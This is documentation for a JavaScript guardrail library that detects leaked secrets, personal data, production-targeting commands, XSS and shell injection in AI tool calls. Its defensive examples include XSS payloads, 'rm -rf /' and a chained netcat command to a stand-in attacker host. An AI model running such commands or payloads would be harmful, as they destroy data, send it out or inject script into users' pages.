Guards
Guards inspect outbound content and tool-call arguments. They focus on data exposure (secrets, PII) and execution safety (XSS, bash). Pair them with validators for full-loop coverage.
Catalogue
SecretGuardvalidateSecrets()Flags 37 leaked-credential types (38 patterns: 27 critical / 9 high / 2 medium): API keys, AWS keys, GitHub tokens, JWT, OpenAI sk-proj-* (post-2024) + legacy keys, Anthropic sk-ant-* keys, Stripe live/test/restricted keys, Slack tokens, Google API keys, Twilio, SendGrid, Mailgun, private SSH/PGP keys, and more.
- sk-proj-abc123def456…
- aws_access_key_id=AKIAIOSFODNN7EXAMPLE
PIIGuardredactPIIInStringSync()Detects and redacts 30 PII patterns across US, EU, and international (7 US · 18 EU · 5 common) — US SSN, US Phone, ITIN, ABA Routing, Medicare ID, Drivers License, US Passport · IBAN, BIC/SWIFT, UK NINO, UK NHS, German Tax ID + Social Insurance, French NIR, Spanish DNI/NIE, Italian Codice Fiscale, Dutch BSN, Belgian National, Polish PESEL, Portuguese NIF, Austrian Social Insurance, Swedish Personnummer, Finnish HETU, EU VAT · Credit Card (Luhn-validated), Email, IP Address, DOB, MAC Address.
- john.doe@example.com
- 123-45-6789
- 4111-1111-1111-1111
ProductionGuardcheckProduction()Blocks commands and content targeting production environments. 18+ production-keyword patterns, critical deployment-command detection (force push, deploy, kubectl), safe-context detection (comments, documentation), and edge-runtime environment-variable bindings (NODE_ENV, RAILS_ENV, FLASK_ENV, BONKLM_OVERRIDE_SECRET).
- kubectl --context=prod apply
- NODE_ENV=production rm -rf
XSSGuardcheckXSS()Strips reflected XSS payloads — <script>, on*= handlers, javascript: URIs, SVG/MathML smuggling, and DOM-clobbering patterns.
- <img src=x onerror=alert(1)>
- <svg><script>alert(1)</script></svg>
BashSafetyGuardcheckBashSafety()Catches command-injection patterns in shell tool calls — destructive `rm -rf`, directory escape via `../`, SQL injection in shell-wrapped queries, and dangerous chains via `;`, `&&`, `||`, backticks.
- rm -rf /
- cat file.txt; nc attacker.com 4444
Redaction example
PII and secret guards default to detect. To redact, call the sync redactor directly or set action: 'sanitize' on the engine.
import { redactPIIInStringSync } from '@blackunicorn/bonklm'
const safe = redactPIIInStringSync('Email me at jane@example.com about SSN 123-45-6789')
// → 'Email me at [REDACTED:email] about SSN [REDACTED:ssn]'